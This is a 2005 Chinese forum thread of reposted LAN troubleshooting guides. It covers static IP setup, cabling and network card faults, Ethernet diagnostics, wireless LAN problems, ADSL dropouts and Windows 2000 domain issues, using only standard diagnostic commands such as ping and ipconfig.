
如何利用空闲的网络端口
    问:学校的教室里有很多空闲的网络端口，虽然我带着笔记本电脑，但是不知道它们是否能够连接到交换机，并且不清楚IP地址（我们使用的是静态IP）、子网掩码、默认网关、DNS等信息。该用什么方法连通网络呢？
    答：可以通过以下方式测试端口，以便连通网络。
    1．将笔记本电脑接入空闲端口，如果笔记本电脑网卡的指示灯开始闪烁，说明已经连接到局域网。如果网卡的信号指示灯不亮，说明该端口没有从配线架连接交换机，无法接入网络。
    2．如果网络规模较小，可能没有划分VLAN。这样，网络内任何计算机的IP地址信息完全相同，查看一下其他计算机的IP地址信息，再为自己的计算机进行设置。需要注意的是，子网掩码、默认网关、DNS应当与其他计算机相同，而IP地址应当与其他计算机不同。另外，一些不太“吉利”的IP地址可能被空出不用，所以，不妨选出来试试。
    3．如果网络规模较大，可能会划分VLAN。VLAN的划分是有规律的，通常是按照部门来划分的。因此，可以根据端口的位置判断其所在的VLAN。同一VLAN内的子网掩码、默认网关、DNS信息是相同的。可以查看一下相邻计算机的IP地址信息，然后尝试设置。
    4．如果网络采用动态IP地址分配，则只须将计算机设置为“自动获取IP地址”即可。
    提醒大家：IP地址由网络中心统一管理，私自设置IP地址很有可能会导致IP地址冲突，造成网络通讯和网络服务的中断。
--------------------------------------------------------------------------------
作者: 人魔　　时间: 2005-12-30 02:48　　 标题: 局域网经典故障解决

网段不同，能互访服务器吗
    问：一台服务器安装了Windows 2000系统并设置为Web服务器和FTP服务器，同一网段的计算机就可以访问这台服务器。是否有方法可以让不同网段的计算机也可以访问Web服务器和FTP服务器呢？
    答：可以根据不同情况分别处理：
    1．如果所有的计算机都位于同一网络，仅仅是划分了不同的IP地址，那么，仅为该服务器指定不同网段的IP地址即可。
    2．如果不同网段的计算机位于不同的网络（VLAN），那么，只要不同网络之间能够相互通讯，就可以实现对Web服务器和FTP服务器的访问。不同网络之间可以借助于网桥和三层设备（三层交换机或路由器）实现通讯。
    3．如果不同网段之间不能进行通讯，可以在服务器上再安装几块网卡，分别连接至不同的网络，分别指定相应网络的IP地址信息，但默认网关只能设置一个。

--------------------------------------------------------------------------------
作者: 人魔　　时间: 2005-12-30 02:48　　 标题: 局域网经典故障解决

故障现象：
    一日在上网的过程中我接连打开了几个网页，由于网页上有图片，下载的速度比较慢，我于是又同时打开了Foxmail邮件客户端来接收邮件，这时我发现网络忽然停滞了下来，不但经常连接的邮件服务器连不通，而且所有的网页下载都同时停止了响应，我的上网主机陷入了瘫痪状态。
    处理过程：
    一、我的第一反应是主机的病毒发作或是中了网页木马。于是立即关闭了所有的应用程序，关闭了Windows2000操作系统，用干净的引导软盘启动系统后，迅速加载防病毒防木马程序对系统进行一次全面的清剿。这一过程足足耗时40多分钟，结果却一无所获。

    二、而后我怀疑是局域网出了问题。重启系统以后，依次点击系统菜单中的“开始——运行”，在弹出的对话框中输入CMD并回车，进入DOS命令行窗口，敲入“ping 网关IP 地址”，系统响应“Request Time Out”，看来问题是由网络本身所引起的。通过询问公司同事获知，他们的上网一切正常。于是可以确定问题不在局域网，而是出在本机自身的网络部分。
    三、首先考虑到的当然是相对脆弱的网线了。但是当我用“替换法”将本机的网线拔下，插入到局域网中另外一台同样配置的主机上时，其网络的速度却运作如飞，于是就可以排除网线自身质量原因所造成的问题。
    四、最后的目光只能聚集在这台主机的内置网卡上了。这个集成在主板上的网卡，最近因为网络的调整而经常进行网线的拔插，是否是因为接口部分接触不良或是网卡的固定部分发生了松动所造成的呢？我于是再次关闭了主机，打开机箱的面板，找到内置网卡的所在，用手将其重新固定校正。而后再次启动系统，打开浏览器，呵！上网速度恢复如初。为了确保网络故障不再重演，我又重复了一下引发网络故障的上述操作，网络仍然能够保持畅通。这就证明了问题的罪魁祸首是出在主板的内置网卡上了

--------------------------------------------------------------------------------
作者: 人魔　　时间: 2005-12-30 02:49　　 标题: 局域网经典故障解决

查找局域网故障技法
--------------------------------------------------------------------------------
    网络经常会出现故障，就如人会经常生病一样，在出现网络问题之后，最重要的是不要着急，头脑要保持清醒。查清问题出在哪里，一般有以下几种情况：
    一、当整个网络都不通时，可能是交换机或集线器的问题，要看交换机或集线器是否在正常工作。
    二、只有一台电脑网络不通，即打开这台电脑的“网络邻居”时只能看到本地计算机，而看不到其它计算机，可能是网卡和交换机的连接有问题，那么我们首先要看一下RJ-45水晶头是不是接触不良。然后再用测线仪，测试一下线路是否断裂。最后要检查一下交换机上的端口是否正常工作。
    三、在“网络邻居”中不能看到本地计算机，或打开“开始/运行”中用“PING”命令，“PING”本地计算机的IP地址不通时，说明你的网络设置有问题，那么首先想到的应该是网卡，我们可以打开“控制面板/系统/设备管理/网络适配器”设置窗口，在该窗口中检查一下有无中断号及I/O地址冲突，一般情况下NE2000系列的网卡为IRQ3，8029芯片的网卡为IRQ10。如发现网卡没有冲突，下一步就要检查驱动程序是否完好，然后重新安装网卡的驱动程序。
    四、在“网络邻居”中能看到网络中其它的计算机，但你不能对它们进行访问，那么可能是你的网络协议设置有问题。把你以前的网络协议删除后，再重新安装，并重新设置。

--------------------------------------------------------------------------------
作者: 人魔　　时间: 2005-12-30 02:49　　 标题: 局域网经典故障解决

问题1:逮捕物理层的滥用者
-用户抱怨-不能登陆或时断时续
-症状-只影响一个工作站，而该站原先没有问题
-查找问题：
    电缆终端链路太长。用户每天都移动，弯曲，连接和切断网络终端（尤其时膝上型笔记本电脑）。廉价的电缆测试仪就能检查这种问题。在你能确切地说是电缆的问题之前，通常首先考虑不是电缆的问题。这需要使用网络测试工具来证明本地网段的健康状况是否良好，集线器端口功能是否正常，网卡及其驱动程序工作是否良好。最后，检查网络互连设备是否有问题。只有此时，你才会知道为了孤立有问题的终端，断开的连接器或是接地回路等问题该从何处着手测试电缆。在铜轴线网络中，搜寻在同轴“T型头”和网卡之间的断头，在UTP网络中，连续运行仪器图测试功能，不断扭动终端以识别接触不良或短路。
-解决问题：
    更换工作站连接电缆，更换损坏的连接器，或者必要的话停止使用水平电缆。再次全面检查处理过的电缆。
问题2：快速以太网比升级前的以太网还慢
-用户抱怨-10Mbps的以太网速度慢，升级为100Mbps快速以太网后甚至不能连接上网。
-症状-影响新工作站或升级的工作站连接上网。
-查找问题：
    对于UTP5类非屏蔽双绞线，用电缆测试仪测试其是否符合对应100Mbps传输速率的EIA/TIA-TSB67标准。某些在10Mbps以太网工作正常的电缆链路因为近端串扰太大在100Mbps以太网就不能正常工作。信号耦合到邻近线对引起高频信号传输失败。将UTP的线对分开甚至会使网络在达到一定流量时瘫痪。
-解决问题：
    更换或停用不能连接的链路，故障清除后再全部测试处置过的链路。
问题3:无效的看门狗
-用户抱怨-不能连接Novell网络的Netware远程服务器
-症状-影响本网段内与服务器相连的所有工作站
－查找问题：
    检查网段的健康状况，注意观察其利用率，碰撞，错误帧和广播帧水平。此时可观察到大量的碰撞或错误帧，该碰撞或错误帧可引起客户机和服务器之间“Hello”帧出现延迟。再某仪指定的服务器所再的远端网段重复此测试。如果两个网段都出现空白，用网络测试仪向路由器中的SNMP代理查询，检查两个网段之间的路由表。确定该路径不存在拥挤问题。为了有效地使用资源，在看门狗允许地时间内如果客户机对“Hello”帧无反应，则Novell服务器会将该客户机注销。
-解决问题：
    简便地方法时改变看门狗时延地参数，将Novell服务器中的该参数改大。如果情况有所改善，则可确定为引起帧丢失的原因，纠正看门狗延时帧计时器的参数。
问题4:刍菊链效应
-用户抱怨-网络服务变慢
-症状-影响某个以太网段的所有用户。网络服务（访问服务器）变慢，但与所连接的某的服务器无关。
-查找问题：
    在高峰时段将网络测试仪连入集线器，运行网络健康状况测试。此时将会观察到大量错误帧。在10BASE-2网络中，错误帧的类型归类为“延迟碰撞”。在10BASE-T网络中帧错误的类型归类为典型的帧校念序列错误（FCS错误），随着网络用户的增长，新增加的集线器通常与原来的集线器形成效应。
-解决问题：
    统计一下任意两个网络设备之间经过的中继器的数量。在10Mbps以太网中不应超过4个，在100Nbps快速以太网中不应超过2个。如果数量超标，则按以太网的标准修正网络拓扑结构，然后再错误帧是否还出现。
问题5:IP网络管理者的报应
-用户抱怨-一个工作站间隙性出错，不能登陆或者不能访问远端服务器
-症状-只影响一个工作站，通常在增加、移动、变更工作站后出现此问题
-查找问题：
    先排除用户是否有帐户和安全设置方面的潜在问题。让用户登陆并且试图从另一个工作站重复这一操作。如果成功，则可以用网络测试仪从用户端到服务器之间的链路状况。然后测试网卡，检测硬件和驱动程序的功能和状况。如果没有问题则检查IP设置，确定用户的IP地址是否有效或者是否有重复的IP地址。确定本网段的子网掩码和路由器默认地址是否正确，DNS服务器（如果有）地址是否专用。如果一个新工作站的IP地址与打印服务器的 IP地址设置重复，将会把每个人的打印工作指向该新客户机。
-解决问题：
    改为合适的设置，然后重启工作站
问题6：光纤错觉
-用户抱怨-整个网络变慢
-症状-影响所有连接到网段上的工作站
-查找问题：
    在正常的网络使用时段，将网络测试仪连接到集线器，在光纤连接的两端产生流量，每边健康状况。在某一时刻断开或接上光纤，每当光纤连入网段时，就会观察到大量的错误帧。劣质的光纤链路连接会在其附属的网段中产生大量垃圾帧，迫使工作站重发帧，网络速度变慢。
-解决问题：
    清洁或重新安装好光纤连接器，复位所有的连接器，再次检查网络健康状况，此时应该只有少量的错误帧。
问题7：奇怪！难道电缆在夜间受到过撞击？
-用户抱怨-不能连接上网或不能登陆
-症状-网段上只有一个工作站能上网
-查找问题
    断开工作站的连接电缆，接上网络测试仪，注意从集线器上检测不到连接信号。运行电缆测试，查看从办公室到配线间之间的电缆是否开路。如果长度正常，将工具设置在音频发生器位置，从配线间用音频探测器查出与办公室对应的电缆，通常情况下，在配线间有变动时，电缆线索会受到推挤和碰撞，引起连接器脱落或松动。
-解决问题：
    重新插好工作站和工作站和集线器之间的电缆连接器，查看连接信号指示灯是否发亮，确定用户是否能上网。
-问题8:“病人”的心还在跳吗？
-用户抱怨-在网络繁忙的稿费期访问网络的速度很慢
-症状-个别网段的所有工作站对不论是本网段的服务器还是其它网段的服务器都无反应。
-查找问题：
    在高峰时段将网络测试仪连接到该网段。运行该网段的网络健康测试，注意网络的利用率、碰撞、错误帧、广播帧的状况，此时可能看到平均碰撞率不正常，观察到的流量中可能有高达50%是碰撞帧碎片。这是帧信号收发错误——SQL(Signal quality error)的表现。“心跳”信号被不经意地停留在“博”的位置。
-解决问题：
    定位网络中每一个信号收发者。检查SQE开关是否位于“关”的位置。此信号用在早期的10BASE-5以太网中，新的以太网设备已不再使用。
问题9：可以连接，但不能登陆
-用户抱怨-不能登陆到欲连接的服务器
-症状-问题通常再新安装或重新设置工作站后出现，但仅限于一个工作站
-查找问题：
    断开工作站连线，接上网络测试仪，执行IPXPing或者再取得服务器列表后来检查配置得哪一层得网络协议。注意帧得封装类型（例如802.2）。现在可以测试网卡，检查安装和运行程序是否正确。还要注意检查网卡绑定帧得类型（比如802.3）。两个帧类型要匹配，如果服务器和工作站运行得帧类型不同，则不能连接上网。
-解决问题：
    用Editor打开工作站得NET.CFG,修改其中一行：将FRAME-ETHERNET-802.3改为FRAME-ETHERNET-802.2之后将工作站连接上网，重启。检查服务器连接状况。
问题10：莫名其妙得间歇性连接中断
-拥护抱怨-服务速度太慢，连接间歇性中断
-症状-问题仅再一个网站上出现，与正在访问得代理服务器无关。
-查找问题：
    断开网站，接上一个具有流量发送（此为诊断过程得一部分）功能得测试工具，检查网络得利用率，碰撞和错误帧水平，确定网络是否健康。若仪器检测通过而只是网站时通时断，则表明时典型得物理层故障。进行电缆链路测试（包括用户连接电缆），此时长度测试可能显示电缆超长（UTP电缆为100米，铜轴电缆为185米）。超过IEEE规定的允许长度，着将会引起局域网内的传输信号严重衰减。
-解决问题：
    在链路中增加中继器，使电缆长度限制再允许的范围内。另一个办法就是用光纤代替电缆或铜轴线。
总结：从以上例子可以清楚的看到，为了查找通常的网络错误，配置合适的网络测试工具是非常必要的

--------------------------------------------------------------------------------
作者: 人魔　　时间: 2005-12-30 02:50　　 标题: 局域网经典故障解决

无线局域网故障
现在家庭或单位已经逐渐开始使用无线网络，特别是近期廉价无线局域网套餐的普及，无线局域网已经不再“曲高和寡”。

         随之而来的问题和故障也开始让无线局域网用户烦恼。下面我们就走近形形色色的无线局域网故障，看看如何解决这些新问题。
         故障现象：

         无法安装USB无线网卡。已经确认，BIOS中USB端口没有禁止，因为USB闪存可以正常使用。

         原因以及解决方法：

         不少USB接口无线网卡的安装需要一定技巧。它与传统的硬件设备安装顺序相反，要先安装网卡驱动程序，再安装网卡硬件。这些无线网卡主要指USB接口的无线网卡。PCMCIA接口的无线网卡不出现这样的问题。

         故障现象：

         拔掉无线PCMCIA网卡后系统死机。

         原因以及解决方法：

         一般出现这类情况都是由于操作不规范。规范的操作顺序是，先在PCMCIA网卡属性中禁止这个设备，再拔掉该设备。或者选“弹出设备”，再拔下网卡。

         故障现象：

         新购买一套无线网络设备，换了使用场所就常常工作不正常，也不知道干扰来自何处。

         原因以及解决方法：

         无线网络所使用的频率段是属于2.4GHz的高频率范围，就日常生活、办公等等所用之电器设备而言，因频率差异甚多，不会互相干扰。目前已经发现的干扰设备主要是微波炉等极个别电器。请注意，将家中的微波炉远离无线网络设备。在不方便查找潜在干扰原因的情况下，更换信道避开干扰更为简单方便，因为无线网络本身共有十几个信道可供调整。实际使用中很难出现自然干扰而无法使用无线设备的现象。

         另外，请按照如下步骤重新调整，使信号接收效果最佳：

         将AP安置在平坦的桌面。将天线与水平面的夹角调整越小越好，信号能穿越的障碍物厚度就越大。避免信号穿越金属物质。确认无线AP处于最佳接收位置。AP尽量离其它电器至少1~2米的距离。

         故障现象：

         安装了无线网络后，发现数据传输速度时快时慢。

         原因以及解决方法：

         因为无线设备与距离、干扰等环境关系密切，它们可以自动根据环境调整速度，因此速度变化是正常现象。最简单的，距离远了，传输数据速度就会降低。一般可以将无线接入设备AP放置在无线局域网设备群的中央，这样使全部无线终端都不会离得太远。下面是基于802.11b标准的速度与传输距离的关系表：

         故障现象：

         安装了某品牌的约50个无线终端（1个AP，50个终端），感觉速度要比其它的品牌的无线设备慢，是否这个品牌设备存在问题。

         原因以及解决方法：

         减少一些无线终端，从几个终端接入开始测试，看此时数据传输速度如何?如果AP稳定，必是1个AP接入点负担太重。为了让无线客户端设备本身有足够之频宽可利用，一般建议一台802.11b的AP支持30个左右无线终端为最佳状态，虽然一个无线接入点（AP）理论上可接入70余台无线终端。

         故障现象：

         两台速度为11Mbps的AP，分别放置在两栋大楼内，直线距离60米左右，关窗则无法建立连接，但将网卡和AP 移到窗边并打开窗户就能建立连接，但数据传输不太稳定，怎样解决。

         原因以及解决方法：

         要使传输距离更长或增强发射功率，可以再购买单独的天线。否则，无线产品信号传输速度和稳定性受环境影响较大。鉴于某些无线网络设备公司无天线产品或用户不愿意再增加投资，建议通过调整天线的角度和产品位置，减少环境信号干扰等方法改善连接状态。另外，可以更换速度为22Mbps（802.11b+）的无线产品网卡和AP，它们的传输性能更好。这也提醒那些正准备购买无线设备的用户，在资金允许的情况下，尽量购买速度高的无线设备，它们的传输速度，信号传输距离及稳定性有较大提高。

         故障现象：

         安装完无线宽带路由器后，无法Ping通这个路由器。

         原因以及解决方法：

         一般的无线宽带路由器都有出厂默认的IP以及网关等设置，需要将它修改成跟你所在网段的设置一样，否则就无法Ping通
--------------------------------------------------------------------------------
作者: 人魔　　时间: 2005-12-30 02:51　　 标题: 局域网经典故障解决

为何无法浏览网页却能用QQ聊天？
    最近发现很多网友上网无法浏览网页却能用QQ聊天之类的问题，确实太多人问了，为了解决各位的疑惑，本人便收集一些资料并和各位探讨下如何排除这个故障。（倒杯茶先）当然偶只是和大家一起分析一下比较常见的故障，具体情况还需具体分析，各位可以参考一下几种情况做相应的措施，希望能给各位带来帮助。

     1、浏览器“连接”选项设置错误
     解决办法：正确设置上网类型。如果是通过代理服务上网的，请正确填写代理服务器的IP地址与端口号；如果不是，请不要勾选“通过代理服务器”这个选项。
     2、DNS服务器设置错误
     解决办法：如果ISP提供商分配给你的是固定的IP地址，那么请正确填写ISP提供的IP地址与DNS服务器地址；如果ISP提供商分配的是动态的IP地址，那么无须填写DNS服务器地址；还有一个可能是ISP提供商的DNS服务器出错不能正确地进行域名→IP地址之间的转换，这个时候你可以在浏览器的地址栏敲入网站的IP地址，即可浏览网页。
     3、防火墙设置错误
     解决办法：如果防火墙设置不当，那么可能阻隔与外网进行信息交换，造成无法浏览网页的故障。我们可以修改防火墙设置。什么，怎么修改？这就不用俺说了吧。嗯，还是说一下，对于不了解的朋友直接选默认级别，选“中”就可以了。

     情况二：ADSL能成功登陆但无法浏览网页的故障解决办法
     首先应该PING ISP的DNS服务器地址,看看能否PING通,如果能PING通,多数是软件问题居多,如果不能PING通,则应该检查硬件设备/线路连接状况和通讯协议(TCP/IP)
    如果能PING通,可以看到类似以下的信息:
    命令ING A.B.C.D
    Reply from A.B.C.D: bytes=32 time=14ms TTL=250
    Reply from A.B.C.D: bytes=32 time=27ms TTL=250
    Reply from A.B.C.D: bytes=32 time=20ms TTL=250
    Reply from A.B.C.D: bytes=32 time=17ms TTL=250
    如果不能PING通,会有以下信息:
    Pinging A.B.C.D with 32 bytes of data:
    time out
    time out
    time out
    time out

    1.有多台电脑的朋友，可以用别的电脑替换，替换的电脑不要装任何代理服务器软件，也不要装任何防火墙，并且只装一个网卡直接和ADSLMODEM相连，正确装上ADSL拨号软件后。看是否能正常浏览，如果能，故障就是用户端的电脑引起，如果不行，就需要检测MODEM和线路是否正常。
    2.只有一台电脑的朋友，可以先停止运行所有代理服务器软件，例如WINGATE 、SYGATE、WINDOWS的INTERNET连接共享（ICS）等等，直接登陆看看故障能否排除，如果停止运行代理服务器软件后故障排除，那可以肯定是代理服务软件的问题。
    3.检查浏览器特别是IE的设置，例如最常见的引发不能浏览网页的故障是在IE中选取了“自动检测设置”，记住这个选项千万不要选取。如果是IE5X版本，单击工具－》INTRENET选项－》连接－》局域网设置，就可以看到该选项，如果该选项前面打了勾，一定要取消。取消后故障就可以解决。
    4.检查TCP/IP协议的属性设置，特别是DNS服务器设置是否正确， 特别要说明的是，拨号软件不同，设置DNS的位置也不一样，有些(在拨号网络的连接图标的属性中设置，有些在控制面板网络中设置，有些在拨号软件（例如ENTERNET300)自带的连接Profile属性中设置。这3个地方都要务必设置正确。
    5.用WINDOWS的朋友，如果经过上述检查都确认正确无误，可以准备好ADSL拨号软件和WINDOWS系统光盘，然后先删除拨号软件，再删除控制面板/网络中的所有TCP/IP协议，重启电脑后再重新添加TCP/IP协议，并打开MODEM电源，重新安装拨号软件，经过测试，如果设置正确无误，重装拨号软件和TCP/IP后大都可以解决拨号能拨通但无法浏览网页的问题。
    6.更换一个浏览器软件例如网景公司的NETSCAPE浏览器浏览测试。
    7.如果你直接连接ADSL MODEM上网的那台电脑装了两个网卡，试试把连接局域网络的网卡先拿起，只留下连接ADSL MODEM的网卡。然后看看故障是否排除，如果故障排除，就应该检查网络和系统资源配置。特别是看看网卡和其他设备有没有冲突（WINDOWS用户可以在控制面板/系统/设备管理中查看设备是否正常）
    8.你的网卡启用了BOOT ROM芯片的引导功能，而且网卡带有PXE的引导芯片之后所造成的。可以这样解决：
    ①如果网卡是集成在主板上的，或者将网上的启动程序写进了BIOS中，可以从BIOS设置中修改系统的引导顺序，如设置硬盘最先引导，或者从BIOS中禁止网卡启动系统。
    ②如果网卡不是集成的，则可以拔掉网卡上的引导芯片或者用网卡设置程序，禁止网卡的BootROM引导功能也可以关机，然后在开机之后，当出现“Press Shift-F10 Configure……”时，马上按“Shift+F10”组合键，进入菜单之后，从第4行中将Boot order rom设置为disable，然后按F4键保存退出。

     情况三：共享上网无法浏览网页
     用Windows XP系统的机器做代理服务器后发现局域网中的其他电脑无法浏览网页，但是有数据流，还可以使用QQ等软件，网络中的各个机器也可以互访。代理服务器为双网卡，在网络配置向导中设置为“网络中的其他计算机通过本机上网”（通过a网卡接局域网），在共享属性中设置为“共享到网络中的b连接”（即第2张，为b网卡）。客户机设置为“通过网络中的其他电脑上网”，操作系统有Windows 98/2000/XP，通过交换机连接。代理服务器接交换机的了个指示灯工作正常（a、b网卡和宽带Modem连接），但客户机上的指示灯只是偶尔亮一下。在打开网页时，可以在状态栏看到“正在打开*****网页”但很长时间都看不到网页，最后显示“网页无法显示”的提示。
     解决措施：可能是你的网线连接和DNS设置存在问题：
     ①做一条级联线，将a网卡直接连接到宽带ADSL上，其他不动。
     ②设置其他客户机的IP地址为192.168.0.2、192.168.0.3、192.168.0.4……，子网掩码设置为255.255.255.0，设置每台客户机的网关地址为192.168.0.1，设置DNS为你的ISP的DNS地址。
     同时，也可以考虑一下代理服务器、网卡之间是否存在着冲突，调换一下PCI插槽、移除暂时不需要的外设等也对问题的解决有一定帮助。

     常见的ADSL断流现象
     网页打不开、下载中断、或者在线视、音频流中断，这些情况都是很多使用ADSL上网的人会遇到的麻烦。可是当仔细检查ADSL MODEM的状态时，又会发现拨号登录已经成功。那么问题究竟出在哪里？
    1.线路不稳定
     如果住所离电信局太远（5公里以上）可以向电信部门申报。确保线路连接正确（不同的话音分离器的连接方法有所不同，请务必按照说明书指引正确连接）。同时确保线路通讯质量良好没有被干扰，没有连接其它会造成线路干扰的设备，例如电话分机，传真机等。并检查接线盒和水晶头有没有接触不良以及是否与其它电线串绕在一起。有条件最好用标准电话线，如果是符ITU国际电信联盟标准的三类、五类或超五类双绞线更好。电话线入户后就分开走。一线走电话、一线走电脑。如果居住的房间都希望安装电话分机，最好选用质量好的分线盒。PC接ADSL Modem附带的双绞线。（注意：手机一定不要放在ADSL Modem的旁边，因为每隔几分钟手机会自动查找网络，这时强大的电磁波干扰足以造成ADSL Modem断流。）
    2.检查您的网卡，如果是ISA网卡最好能换成PCI的，并且选择质量好的网卡，太便宜的网卡可能是造成问题的罪魁祸首。10M或10M/100M自适应网卡都可。另外，双网卡引起冲突同样值得关注，这时，应当拔起连接局域网或其它电脑的网卡，只用连接ADSL的网卡上网测试，如果故障恢复正常，检查两块网卡有没有冲突 。
    3.ADSL Modem或者网卡设置有误
     最常见的是设置错了ADSL Modem的IP地址，或是错误设置了DNS服务器。因为对于ADSL虚拟拨号的用户来说，是不需要设定IP地址的，自动分配即可。TCP/IP网关一般也不需要设置。另外如果设定DNS一定要设置正确，如果操作系统是Windows 9x，在DOS窗口下键入Winipcfg获取DNS地址，在Windows 2000/XP下键入ipconfig /renew，或询问当地电信部门。
     另外，TCP/IP设置最容易引起不能浏览网页的情况，例如没有更改过设置，一直可以正常浏览，突然发现浏览不正常了，就可以试着删除TCP/IP协议后重新添加TCP/IP 协议。
    4.ADSL Modem同步异常
     检查一下自己的电话线和ADSL连接的地方是否接触不良，或者是电话线出现了问题。如果怀疑分离器坏或ADSL Modem坏，尝试不使用分离器而直接将外线接入ADSL Modem。如果确定是分离器没有问题，要保证分离器与ADSL Modem的连线不应该过长，太长的话同步很困难。如果排除上述情况，只要重起ADSL Modem就可以解决同步问题。
    5.拨号软件互扰
     ADSL接入Internet的方式有虚拟拨号和专线接入两种，现在个人用户的ADSL大都是采用前者。而PPPOE（Point-to-Point Protocol over Ethernet以太网上的点对点协议）虚拟拨号软件都有各自的优缺点。经过多方在不同操作系统的测试，如果使用的操作系统是Windows XP，推荐用它自带PPPOE拨号软件，断流现象较少，稳定性也相对提高。如果使用的是Windows ME或9x，可以用以下几种虚拟拨号软件——EnterNet、WinPoET、RasPPPoE。其中，EnterNet是现在比较常用的一款，EnterNet 300适用于Windows 9x；EnterNet 500适用于Windows 2000/XP。当你用一个PPPOE拨号软件有问题时，不妨卸载这个软件后换用一个其它的PPPOE拨号软件，请务必注意不要同时装多个PPPOE软件，以免造成冲突。
    6.其他软件冲突
     卸载有可能引起断流的软件，现在发现某些软件例如QQ 2000b等，偶然会造成上网断流，具体什么条件下会引发，尚要进一步测试。不少网友卸载后就发现断流问题解决了，包括用普通Modem 163拨号上网的用户也有用这种方法解决了断流问题的情况，笔者也收到朋友的邮件反映卸载QQ后断流问题解决，所以如果你有QQ，不妨先卸载你的OICQ，然后再上网试试。当你发现打开某些软件就有断流现象，关闭该软件就一切正常时，卸载该软件试试。
    7.病毒攻击和防火墙软件设置不当
     虽然受到黑客和病毒的攻击可能性较小，但也不排除可能性。病毒如果破坏了ADSL相关组件也会有发生断流现象。建议安装“天网防火墙”或者“金山网镖”网络防火墙，它们都可以实时监控你的计算机和网络的通讯情况，并警告提示莫名的网络访问方式，有效降低受攻击的危险性。如果能确定受到病毒的破坏和攻击，还发生断流现象时就应该检查安装的防火墙、共享上网的代理服务器软件、上网加速软件等，停止运行这类软件后，再上网测试，看速度是否恢复正常。
--------------------------------------------------------------------------------
作者: 人魔　　时间: 2005-12-30 02:51　　 标题: 局域网经典故障解决

问：服务器采用Windows 2000 Server，域内有16台终端。服务器和部分终端(操作系统为Windows 2000 Professional)的时间总是相差13个小时，但服务器时间是准确的。在网上邻居内点击操作系统为Windows 2000 Professional的终端时提示“服务器的时钟与主域控制器的时钟不一致”而无法连接，而点击安装Windows 98操作系统的终端时则可以连接。请问对此该如何解决?
    答：请检查Windows 2000 Professional的时区设置与Windows 2000 Server系统是否一致。从Windows 2000的“控制面板→日期/时间”中，选择“时区”选项卡，工作站的时区选择与服务器的相同即可，推荐全部选择为“GMT+0800北京，重庆……”。
    如果这样不行，请在工作站上运行net time 命令进行手工时间同步。

--------------------------------------------------------------------------------
作者: 人魔　　时间: 2005-12-30 02:51　　 标题: 局域网经典故障解决

问：我建了一个Windows 2000域的服务器，但是在客户端加入到域的时候它有时会出现提示“域运行于安全操作状态”。请问这是什么问题?
    答：在加入Windows2000域的时候，应该输入域的NetBIOS名称(如你的域名是msft.com，则应该输入msft)，而不是域的全称，这个问题大多出现在Windows
    XP的客户机加入Windows 2000域中，在Windows 2000加入Windows 2000的域中通常不会有这个问题。

--------------------------------------------------------------------------------
作者: 人魔　　时间: 2005-12-30 02:52　　 标题: 局域网经典故障解决

解决网络故障的基本方法
  线路故障:
一,检查网络设备：(网卡指示灯，HUB指示灯，路由器，HUB端口)
二,用系统命令进行初步测试
    1,ping　(检查是否连通)
      2,Tracert　(检查通信路径)
    3,netstat　 (显示网络信息及连接状况)
    4,ipconfig 或者 winipcfg　 (检查IP配置)
三,进系统检测网卡安装:
    驱动是否安装正确，IRQ值和I/O地址是否有冲突 (在安装多网卡，为避免冲突，我们都是把com1或者com2 Disable掉了的)
    网络协议故障:
四,检查所需协议的配置
    1,通信协议是否安装完全
    2,TCP/IP四大项(IP,DNS,网关，子网掩码)是否设置正确
    3,有些网游需要IPX/SPX协议的支持，具体有哪些，我也不清楚。
    配置故障:
五,检查工作站硬件相关配置(熟悉COMS的就可以大显身手),和工具软件的配置(比如代理服务器的设置，局域网通信工具的配置等)
六,系统相应配置的参数(访问权限，管理权限等)
    安全故障:
七,如果以上都排除不了问题，那么多数就是病毒感染，黑客入侵或者是安全漏洞了。这些就只能*经验，或者来论坛上求助了。
    理论上四步就能解决问题
    1,识别故障现象，对故障原因位置能进行预测
    2,描述故障现象，确定故障范围
    3,进行测试，缩小故障范围
    4,找到故障，并隔离或排除故障

--------------------------------------------------------------------------------
作者: 人魔　　时间: 2005-12-30 02:52　　 标题: 局域网经典故障解决

局域网速度变慢的原因及排除方法
网线问题
  我们知道，双绞线是由4对线严格而合理地紧密度绞和在一起，减少串扰和背景噪音的影响。同时，在T568A标准和T568B标准中仅使用了双绞线的1、2和3、6四条线。其中，1、2用于发送，3、6用于接收，而且1、2必须来自一个绕对，3、6必须来自一个绕对。只有这样，才能最大限度的避免串扰，保证数据传输。本人在实践中发现不按正确标准(T586A、T586B)制作的网线，存在很大的隐患。有的开始一段时间使用正常，但过一段时间后，性能下降，网速变慢。因此，我们现在要求一律按T586A、T586B标准来压制网线。
  回路问题
  一般当网络较小涉及的节点数不是很多、结构不是很复杂时，这种现象很少发生。但在一些比较复杂的网络中，由于一些原因经常有多余的备用线路，则会构成回路，数据包会不断发送和校验数据，从而影响整体网速，并且查找比较困难。为避免这种情况发生，要求我们在铺设网线时一定要养成良好的习惯，网线打上明显的标签，有备用线路的地方要做好记载。
  广播风暴
  作为发现未知设备的主要手段，广播在网络中起着非常重要的作用。然而，随着网络计算机数量的增多，广播包的数量会急剧增加。当广播包的数量达到30%时，网络传输效率将会明显下降。当网卡或网络设备损坏后，会不停地发送广播包，从而导致广播风暴，使网络通信陷于瘫痪。因此，当网络设备硬件有故障时也会引起网速变慢。当怀疑有此类故障时，首先可采用置换法替换集线器或交换机来排除集线设备故障。然后关掉集线器的电源后用ping命令对所涉及计算机逐一测试，找到有故障网卡的计算机，更换新的网卡可恢复网速正常。
  端口瓶颈
  实际上路由器的广域网端口和局域网端口、交换机端口、集线器端口和服务器网卡等都有可能成为网络瓶颈。我们可在网络使用高峰时段，利用网管软件查看路由器、交换机、服务器端口的数据流量(用netstat命令也可统计各个端口的数据流量)，确认网络数据流通瓶颈的位置，设法增加其带宽。如更换服务器网卡为100M或1000M、安装多个网卡、通过改变路由器上配置来增加带宽等方法都可以有效地缓解网络瓶颈，最大限度地提高数据传输速度。
  蠕虫病毒
  蠕虫病毒对网络速度的影响越来越严重。这种病毒导致被感染的用户只要一连上网就不停地往外发邮件，病毒选择用户个人电脑中的随机文档附加在用户机子上的通讯簿的随机地址进行邮件发送。成百上千的这种垃圾邮件有的排着队往外发送，有的又成批成批地被退回来堆在服务器上。造成个别骨干互联网出现明显拥塞，个别局域网近于瘫痪。因此，我们应时常注意各种新病毒通告，了解各种病毒特征；及时升级所用杀毒软件。计算机也要及时升级、安装系统补丁程序；同时卸载不必要的服务，关闭不必要的端口，以提高系统的安全性和可*性。
  总之，计算机网络的应用越来越广泛，如何提高计算机网络的管理水平，不断学习，注重理论知识和实践经验积累相当重要。

--------------------------------------------------------------------------------
